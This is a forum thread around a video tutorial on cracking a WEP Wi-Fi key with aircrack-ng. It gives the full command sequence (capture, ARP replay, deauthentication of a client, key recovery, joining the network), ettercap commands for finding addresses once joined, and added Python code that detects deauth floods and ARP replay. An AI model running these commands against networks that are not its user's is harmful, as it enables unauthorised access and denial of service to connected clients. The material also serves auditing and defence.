Awesome video, thanks. So, suppose you've cracked a WEP key and DHCP is disabled, so you obviously need an IP and network settings to set statically. So what then? Thanks
Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3129452
Download video: http://www.mediafire.com/?f17myy9vdu4fxic
What is this?
Yet another video on "How to crack WEP".
How does this work?
An ARP beacon is needed (depending on the attack method), so this can be re-injected back into the network. To get these packets the attacker needs to disconnect a client currently connected to the network (if the attacker keeps on repeating this part, it will be a DoS to the client).
Once the key beacon has been captured and enough data injected/collected, it becomes an offline attack, either brute force or a dictionary attack. Then it's just a question of waiting, and the attacker will have the key (brute forcing WEP can take less than 60 seconds!)
From here, the attacker can use that key to decrypt the captured data from before, and is now able to 'read' it as well as join the network.
What do I need?
> Aircrack-ng suite
> WiFi card that supports monitor mode & injection
Software
Name: Aircrack-ng
Version: 1.0-rc3
Home Page: http://www.aircrack-ng.org/doku.php
Download Link: http://download.aircrack-ng.org/airc...1.0-rc3.tar.gz
Commands:
Notes:
Code:
airmon-ng stop mon0
airmon-ng start wlan0
airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0
aireplay-ng --arpreplay -e g0tmi1k -b 00:19:5B:E7:52:70 -h 00:12:17:94:90:0D mon0
aireplay-ng --deauth 10 -a 00:19:5B:E7:52:70 -c 00:12:17:94:90:0D mon0
aircrack-ng output*.cap
ifconfig wlan0 down
iwconfig wlan0 essid g0tmi1k
iwconfig wlan0 key 59EF19C76A
ifconfig wlan0 up
dhclient wlan0
If you want WPA/WPA2 PSK (with a hidden SSID) - See: http://g0tmi1k.blogspot.com/2009/07/...k-wpawpa2.html
Song: Mr. Oizo - Flat Beat
Video length: 03:50
Capture length: 07:23
Blog Post: http://g0tmi1k.blogspot.com/2010/03/...th-client.html
Forum Post: http://www.backtrack-linux.org/forum....html#post7957
Last edited by g0tmi1k; 03-05-2011 at 02:51 PM.
Have you...g0tmi1k?
Here's a quick reference from the aireplay-ng manpage for all the flags used in this video with aireplay-ng, so you don't have to search up and down the actual manpage to see what they mean (maybe include these in popups for future vids?).
One question: why with the --arpreplay attack do you use -b (filter option, AP) with -h (replay option, source MAC), while with --deauth you use both replay options -a and -c? Basically, what's the difference between the filter and replay options? I see that replay sets the addresses, but how do I know when to set vs. when to filter?
Filter options:
-b <bssid> MAC address of access point.
-d <dmac> MAC address of destination.
-s <smac> MAC address of source.
Replay options:
-a <bssid> Set Access Point MAC address.
-c <dmac> Set destination MAC address.
-h <smac> Set source MAC address.
-e <essid>
Fake Authentication attack: Set target SSID (see below). For SSID containing special characters, see http://www.aircrack-ng.org/doku.php?id=faq#how_to_use_spaces_double_quote_and_single_quote_etc._in_ap_names
Attack modes:
-0 <count>, --deauth=<count>
This attack sends deauthentication packets to one or more clients which are currently associated with a particular access point. Deauthenticating clients can be done for a number of reasons:
Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another term for this is "cloaked".
Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate.
Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected).
Of course, this attack is totally useless if there are no associated wireless clients or on fake authentications.
-3, --arpreplay
The classic ARP request replay attack is the most effective way to generate new initialization vectors (IVs), and works very reliably. The program listens for an ARP packet then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. The program retransmits the same ARP packet over and over. However, each ARP packet repeated by the access point has a new IV. It is all these new IVs which allow you to determine the WEP key.
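The two aireplay-ng modes quoted above each leave a pattern a wireless IDS can key on: --deauth sends many deauthentication frames to the same client in a short burst (a real client deauths once when it leaves), and --arpreplay retransmits the very same captured ARP request, so the AP sees a stream of encrypted data frames of identical length from one station. The following is an added example, not code from the thread or the aircrack-ng project, showing both heuristics run over constructed frame records; the record fields (ts, kind, src, dst, bssid, length) and the thresholds are this example's own assumptions, not any capture-file format.

```python
"""Detection heuristics for deauth floods and ARP-request replay.

Added example; frame records are constructed inline and their field names
are this example's own convention, not a pcap or airodump-ng format.
"""
from collections import defaultdict, deque

DEAUTH_THRESHOLD = 5      # deauth frames to one client within the window
DEAUTH_WINDOW_S = 2.0
REPLAY_THRESHOLD = 20     # same-length data frames from one station
REPLAY_WINDOW_S = 1.0

AP = "00:19:5B:E7:52:70"        # BSSID used in the video
CLIENT = "00:12:17:94:90:0D"    # associated station used in the video


def _windowed_alerts(frames, kind, key_of, threshold, window, label):
    """Generic sliding-window counter: alert once per key when `threshold`
    frames of `kind` sharing that key arrive within `window` seconds."""
    recent = defaultdict(deque)   # key -> timestamps still inside the window
    alerted = set()
    alerts = []
    for f in frames:
        if f["kind"] != kind:
            continue
        key = key_of(f)
        q = recent[key]
        q.append(f["ts"])
        while q and f["ts"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"type": label, "key": key, "count": len(q), "at": f["ts"]})
    return alerts


def detect_deauth_flood(frames, threshold=DEAUTH_THRESHOLD, window=DEAUTH_WINDOW_S):
    """Alert on (bssid, client) pairs receiving a burst of deauth frames."""
    return _windowed_alerts(frames, "deauth", lambda f: (f["bssid"], f["dst"]),
                            threshold, window, "deauth_flood")


def detect_arp_replay(frames, threshold=REPLAY_THRESHOLD, window=REPLAY_WINDOW_S):
    """Alert when one station floods the AP with identical-size data frames;
    normal traffic varies in size, a replayed ARP request never does."""
    return _windowed_alerts(frames, "data", lambda f: (f["src"], f["bssid"], f["length"]),
                            threshold, window, "arp_replay")


def sample_frames():
    """Constructed records: ordinary traffic, one benign deauth, then a
    deauth burst and an ARP replay burst."""
    frames = []
    for i, ln in enumerate([90, 1500, 120, 64, 1500, 300]):   # ordinary traffic
        frames.append({"ts": i * 0.3, "kind": "data", "src": CLIENT,
                       "dst": AP, "bssid": AP, "length": ln})
    frames.append({"ts": 5.0, "kind": "deauth", "src": AP, "dst": CLIENT,
                   "bssid": AP, "length": 26})                # client leaves normally
    for i in range(10):                                        # deauth flood
        frames.append({"ts": 10.0 + i * 0.05, "kind": "deauth", "src": AP,
                       "dst": CLIENT, "bssid": AP, "length": 26})
    for i in range(30):                                        # replayed ARP request
        frames.append({"ts": 20.0 + i * 0.02, "kind": "data", "src": CLIENT,
                       "dst": AP, "bssid": AP, "length": 68})
    return frames


def run():
    """Run both detectors over the constructed sample and return the alerts."""
    frames = sample_frames()
    return detect_deauth_flood(frames) + detect_arp_replay(frames)


if __name__ == "__main__":
    for alert in run():
        print(alert)
```

On real traffic the same two counters would be fed from monitor-mode captures; the single benign deauth at t=5 falls out of the window before the burst starts, which is why it raises nothing.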
Hey great video. I'm completely a newbie but I stumbled across BackTrack and have been looking into how it works and want to test the strength of my Wi-Fi password. (Mainly because I'm paranoid and every time my internet goes slow I assume someone has found a way in, sort of silly I know..but possible)
Right now it's currently a WEP and I'm not going to change to a WPA until I can crack it. I followed your steps (which were very easy by the way) but then....
When I got to the last step where you cracked the key I got
"Failed. Next try with 30000 IVs" instead of the WEP key. Any ideas why?
I'm also not sure how to make it capture more IVs. I waited for time to pass and ran the aircrack command again but got the exact same message.
Edit:
Sorry, just a little extra information: around 2:20 of the video, when I'm looking at the packets sent in shell 2, it is zero and I'm not sure why. Is that important? The data is increasing in shell one though.
Update:
I finally got my own WEP code so I'm going to definitely upgrade to a WPA lol because it wasn't too hard. I am curious to find out why it was failing before though. This time I let shell one run longer after the code
airmon-ng start wlan0
before using
eg. airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0
would that have made a difference at all or is it just a big coincidence?
Last edited by athemak; 05-12-2010 at 04:44 AM. Reason: more info and update
Well you can either try and guess what the IPs are (192.168.1.1, or 192.168.0.1 or 192.168.1.254, or google)
OR
Thanks petabyte
There are a lot of ways to do it. For example you can use the ettercap plugin find_ip to find a free IP and the plugin gw_discover to find the gateway.
To find the IP:
ettercap -T -i interface_name -P find_ip //
To discover the gateway:
ettercap -T -i interface_name -P gw_discover
Disabled DHCP! how to find out IP - Remote Exploit Forums
mastodongle
It's an idea I have thought about doing, and one day I may end up doing it! Anyway...
Here's a quick reference from the aireplay-ng manpage for all the flags used in this video with aireplay-ng, so you don't have to search up and down the actual manpage to see what they mean (maybe include these in popups for future vids?).
...
One question: why with the --arpreplay attack do you use -b (filter option, AP) with -h (replay option, source MAC), while with --deauth you use both replay options -a and -c? Basically, what's the difference between the filter and replay options? I see that replay sets the addresses, but how do I know when to set vs. when to filter?
Trial and error? arpreplay asks for -b and -h, deauth asks for -a -c.
"Failed. Next try with 30000 IVs" instead of the WEP key. Any ideas why?
Yep. You haven't got enough of the "right" packets. You just need to collect more.
I'm also not sure how to make it capture more IVs. I waited for time to pass and ran the aircrack command again but got the exact same message.
Either wait for some activity OR generate some.
Last edited by g0tmi1k; 05-14-2010 at 07:44 AM.
Have you...g0tmi1k?
I don't get how you decide which BSSID/station to use?
g0tmi1k - is my network (so that is the ESSID).
If you follow "g0tmi1k" across...it has "00:19:5B:E7:52:70" (as the BSSID)
Then moving down (to the client area), you see that in the "BSSID" column, one of them is the same as the BSSID from above (00:19:5B:E7:52:70). Move across to "station" - there is the MAC address of the client (00:12:17:94:90:0D) which is connected to my network (g0tmi1k)
This is what I'm doing at 0:24 - 0:57 in the video.
Have you...g0tmi1k?
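The lookup described in that answer (follow the ESSID across to its BSSID in the AP table, then find the rows in the station table whose BSSID column matches) is exactly what airodump-ng's --write CSV export lets you do offline, for instance to inventory which clients are associated with your own AP. The following is an added example, not code from the thread or the aircrack-ng project; the CSV text is constructed, and its column layout (an AP table, a blank line, then a station table, each with a header row) is this example's assumption about the airodump-ng CSV file.

```python
"""Read an airodump-ng CSV export and list the stations associated with
the AP that carries a given ESSID.

Added example. SAMPLE_CSV is constructed; the layout it follows is an
assumption about the airodump-ng --write CSV output.
"""
import csv
import io

# Constructed sample modelled on the airodump-ng CSV layout (assumption).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:19:5B:E7:52:70, 2010-03-05 12:00:00, 2010-03-05 12:05:00,  8,  54, WEP , WEP, OPN, -40, 500, 1200, 0.  0.  0.  0, 7, g0tmi1k,
00:0F:66:AA:BB:CC, 2010-03-05 12:00:02, 2010-03-05 12:05:00,  1,  54, WPA2, CCMP, PSK, -65, 480, 0, 0.  0.  0.  0, 9, neighbour,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:12:17:94:90:0D, 2010-03-05 12:00:10, 2010-03-05 12:05:00, -50, 300, 00:19:5B:E7:52:70, g0tmi1k
00:1E:4C:11:22:33, 2010-03-05 12:00:30, 2010-03-05 12:04:00, -62, 40, 00:0F:66:AA:BB:CC, neighbour
00:23:12:44:55:66, 2010-03-05 12:01:00, 2010-03-05 12:01:30, -80, 3, (not associated), linksys
"""


def _parse_table(block):
    """Turn one CSV section into a list of dicts keyed by its header names,
    so the code reads columns by name ("BSSID", "ESSID", "Station MAC")
    instead of by position."""
    rows = list(csv.reader(io.StringIO(block), skipinitialspace=True))
    header = [h.strip() for h in rows[0]]
    table = []
    for row in rows[1:]:
        if not any(cell.strip() for cell in row):
            continue                      # skip empty lines
        table.append({h: v.strip() for h, v in zip(header, row)})
    return table


def parse_airodump_csv(text):
    """Split the export at its blank line into the AP and station tables."""
    ap_block, _, station_block = text.partition("\n\n")
    return _parse_table(ap_block), _parse_table(station_block)


def bssid_for_essid(aps, essid):
    """Step one from the post: follow the ESSID across to its BSSID."""
    for ap in aps:
        if ap["ESSID"] == essid:
            return ap["BSSID"]
    return None


def stations_for_bssid(stations, bssid):
    """Step two: station rows whose BSSID column matches the AP's BSSID.
    Rows marked "(not associated)" never match a real BSSID."""
    return [s["Station MAC"] for s in stations if s["BSSID"] == bssid]


def associated_clients(text, essid):
    """Return (bssid, [station MACs]) for the AP carrying `essid`, or
    (None, []) when no AP in the export has that ESSID."""
    aps, stations = parse_airodump_csv(text)
    bssid = bssid_for_essid(aps, essid)
    if bssid is None:
        return None, []
    return bssid, stations_for_bssid(stations, bssid)


if __name__ == "__main__":
    print(associated_clients(SAMPLE_CSV, "g0tmi1k"))
```

Reading the two tables by header name rather than column index keeps the script working if a future airodump-ng version adds a column, and the "(not associated)" rows (clients probing for networks but joined to none) naturally drop out of the match.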
What does it mean when it says "mon0 is on channel -1, but the AP uses channel 1"? How should I fix that? Thanks in advance.